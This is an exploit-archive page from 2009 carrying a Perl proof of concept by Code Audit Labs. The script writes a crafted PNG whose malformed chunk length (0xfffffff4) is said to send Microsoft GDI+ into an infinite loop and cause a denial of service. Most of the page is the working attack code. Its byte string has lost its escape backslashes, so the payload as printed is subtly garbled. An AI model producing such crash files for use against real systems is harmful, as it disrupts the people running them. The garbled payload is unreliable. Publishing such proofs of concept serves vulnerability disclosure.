Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC
# Published : 2009-04-17
# Author : Code Audit Labs
# Previous Title : Microsoft Media Player (quartz.dll .mid) Denial of Service Exploit
# Next Title : XRDP <= 0.4.1 Remote Buffer Overflow PoC (pre-auth)

#! /usr/bin/perl
#CAL_gdiplug_poc.pl
#
# Mircosoft_gdiplug_png_infinity_loop_D.o.S POC
# by Code Audit Labs public 2009-04-17
# http://www.vulnhunt.com/
# 
#Affected
#========
#test on full updated winxp sp3
#other version should be affected
#
#CVE: please assign to a CVE number
#
#DESCRIPTION
#===========
#
#  The vulnerability exists within the code in MicroSoft Gdi+ processing crafted png file. that cause infinity loop to cause high CPU(100%) and D.o.S . 
#
#
#ANALYSIS
#========
#
#  png chunk
#
# {
#	DWORD btChunkLen;
#	CHAR btChunkType[4];
#} CHUNK_HEADER;

#if btChunkLen is 0xfffffff4, would cause code fall into infinity loop
#

open(Fin, ">poc.png") || die "can't create crash sample.$!";
binmode(Fin);
$data = 
"x89x50x4ex47x0dx0ax1ax0ax00x00x00x0dx49x48x44x52" .
"x00x00x03x00x00x00x04x00x08x02x00x00x00xd9x44xa9" .
"x57xffxffxffxf4x41x41x41x41x62x01x08xcbx06x49x3e" .
"xd7x0ax00x22xe3xf1x32x3exe8";

print Fin $data;

close(Fin);

# www.Syue.com [2009-04-17]